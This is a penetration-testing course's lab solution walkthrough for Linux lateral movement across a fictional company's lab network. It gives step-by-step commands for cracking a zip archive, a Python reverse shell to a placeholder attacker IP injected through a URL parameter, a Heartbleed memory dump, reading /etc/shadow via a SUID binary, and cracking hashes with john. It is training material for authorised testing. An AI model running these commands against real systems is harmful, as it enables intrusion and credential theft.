© 2018 Caendra Inc.

| Hera for PTPv5 | Linux Exploitation (Lateral Movement) 1

Now that we’ve made our way into the Robots To Go, Inc. organization network through the
exploitation of multiple vulnerabilities on several of their Linux systems, we are now tasked
with moving laterally through the environment. We continue on this path by obtaining
credentials and other sensitive information and using that information to further push our
way laterally through the network, and furthermore, obtaining access to other systems as a
result of that information that we obtain.

Target Organization: Robots To Go, Inc.

Scope: The scope is limited to the following domain and netblock:

1. Netblock: 172.16.80.1/24
2. Domain: robotstogo.localdomain

Task: Perform lateral movement tasks on the live systems.

• Identify Vulnerabilities from a Remote Exploitation perspective.

• Use discovered vulnerabilities to move laterally to other machines.
• Elevate Privileges

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 2
 • Metasploit
• Nmap
• Bash Shell
• Netcat

We’ve obtained access to multiple systems within Robots To Go, Inc.’s environment using a
number of different techniques and exploits. Our next phase is to conduct lateral movement
tasks in order to complete our objectives defined by the customer. Using the knowledge
we’ve gained from previous phases of the engagement, we strengthen our footholds within
the target infrastructure and use the information and credentials we’ve obtained from
compromised hosts to move onto other systems we otherwise didn’t have access to initially.

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 3
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 4
Below, you can find solutions for each task for the Lateral Movement tasks. Remember
though that you can follow your own strategy (which may be different from the one
explained in the following lab). Additionally, the labs contain additional vulnerabilities not
covered below which can also be exploited but may not necessarily be required to
complete the tasks below. Exploit as many of the vulnerabilities you find!

During our initial enumeration phase, an NFS share on IP address 172.16.80.27 should have
revealed some information we might find useful (a .zip archive). Obtain the information
within the archive to obtain access to another system with that information.

While enumerating NFS shares, we found that one particular share was accessible and
contained a “backup.zip” file:

# nmap --script nfs-ls 172.16.80.27

We next, need to mount that NFS share, and access the backup.zip archive:

# mkdir /mnt/172.16.80.27_nfs
# mount -t nfs 172.16.80.27:/home/simon /mnt/172.16.80.27_nfs -o nolock

Once we mount the share, we browse to our local /mnt/172.16.80.27_nfs location, we copy
the backup.zip file to our /tmp directory:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 5
# cd /mnt/172.16.80.27_nfs
# cp backup.zip /tmp
# cd /tmp

We quickly find that when attempting to unzip the archive, it is password protected:

# unzip backup.zip

We can use “fcrackzip” to run a dictionary attack against the zip archive using the rockyou.txt
wordlist, and hopefully, access its contents with the following command:

# fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt backup.zip

The fcrackzip program successfully cracks the backup.zip archive, and reveals a password of
“====0open/n”:

We unzip the archive with our found password:

# unzip -P ‘====0open/n’ backup.zip

We can now read the contents of the file in the backup.zip archive:

# cd backup/
# cat notes.txt

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 6
TEMP MGMT CONSOLE:
https://172.16.80.24:4433/xl0827_dev_

The “notes.txt” file reveals information to a hidden web directory on another system
172.16.80.24 on port 4433, which we should navigate to:

Clicking on the “here” link within the page reveals a parameter (x=) in the URL of the page:

Reading the message left for devs of the organization, there’s a good chance we may be able
to execute arbitrary commands via that parameter. We try with “?x=id”

url: https://172.16.80.24:4433/xl0827_dev_/?x=id

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 7
We’ve confirmed command execution via the “x” parameter! Let’s use that to get a reverse
shell once again with a netcat listener on our attacker machine, but this time, we’ll use a
python reverse shell and execute that from the “x” parameter:

On attacker:

# nc -nlvp 1234

On target system via the “x” parameter of the hidden web page (make sure to change
<ATTACKER_IP> and <ATTACKER_PORT> values to your listener parameters, and also, the
below code may need to be manually typed, as to make sure all characters are properly

URL:

https://172.16.80.24:4433/xl0827_dev_/?x=python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con
nect(("<ATTACKER_IP>",<ATTACKER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.filen
o(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We receive a reverse python shell as the “www-data” user:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 8
We have identified information from an NFS share on the “172.16.80.27” system, and have
used that to obtain access to a hidden directory on 172.16.80.24 as the “www-data” user.

During enumeration, we identify that the system “172.16.80.24” contains a web server
running on port 4433 over HTTPS. We also, when scanning that port for vulnerabilities,
discover that it is vulnerable to heartbleed. We use the “+” character before the script name
so that nmap forces checking of the vulnerability on port 4433:

# nmap --script +ssl-heartbleed 172.16.80.24 -p 4433

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 9
Having identified a machine vulnerable to heartbleed, we use the Metasploit heartbleed
exploit module to DUMP contents of the machine’s memory in an attempt to get credentials
or other sensitive information we might be able to use to log onto other systems:

msf > use auxiliary/scanner/ssl/openssl_heartbleed

msf > set RHOSTS 172.16.80.24
msf > set RPORT 4433
msf > set action DUMP
msf > exploit

Seeing as the exploit was successful, we then run the “strings” command against the resulting
.bin file to reveals some information dumped from memory:

# strings /root/.msf4/loot/….openssl.heartble_151722.bin

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 10
Looks like some credentials for a user “Amanda.” If we think back to the information
gathering phase, and during enumeration of SMB, we should have noticed a user named
“Amanda” from those findings which were relevant to the “172.16.80.27” machine. We try
the above credentials on the SSH port of the 172.16.80.27 machine:

# ssh [email protected]

And are able to successfully log onto the 172.16.80.27 machine as “amanda” using
credentials we identified from the heartbleed exploit against the 172.16.80.24 machine:

One of our first steps at this point is to start post-exploitation enumeration of the system,
and we realize that “Amanda” can execute a SUID root executable “/usr/local/bin/catme,”
among other things.

$ find / -perm -4000 2>/dev/null

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 11
We find that the “catme” executable allows reading of any files as root:

$ catme /etc/passwd

In the image above, you’ll also notice that the user “damien” has a UID of 0 when we take a
look at the /etc/passwd file. This means that the Damien user is a root user on the system.
Knowing this and knowing we can also read the /etc/shadow file since we can use the
“catme” SUID executable to read files as root, we will attempt to crack the “damien” users’
hash and see if we can get root access on the system as Damien. We use “unshadow” and
“john” to create a file we can use for john, but first, we copy both the /etc/passwd file and
/etc/shadow to the /tmp directory on the system using the SUID executable to redirect the
output of both of those files:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 12
$ cd /tmp
$ catme /etc/passwd > passwd
$ catme /etc/shadow > shadow

Once we have both the /etc/passwd and /etc/shadow files copied to the /tmp directory, we
need to transfer those to our attacker system. We can spin up a python HTTP server on port
8888 on the target machine, and download the two files to our attacker system:

Target System in /tmp directory:

$ python -m SimpleHTTPServer 8888

On Attacker system to copy files from target:

# wget http://172.16.80.27:8888/passwd
# wget http://172.16.80.27:8888/shadow

Next, on our attacker system, we’ll use the “unshadow” program to concatenate the two files
into a format we can use for cracking with john:

# unshadow passwd shadow > shadow.john

Next, we can run john against the shadow.john file, and using the “fasttrack.txt” dictionary as
a wordlist:

# john shadow.john --wordlist=/usr/share/wordlists/fasttrack.txt

John quickly cracks the password (secuirty3) for “damien,” and we can now log into
172.16.80.27 as that user. We can also see that our GID is root, and additionally, through
information gathering of our current user, we can see that “Damien” is part of the “sudo”
group, which means he should be able to sudo any command as root.

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 13
# ssh [email protected]

Knowing this information, we can sudo a bash shell and obtain UID 0 status once we enter
Damien’s password:

Root again!

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Lateral Movement) 14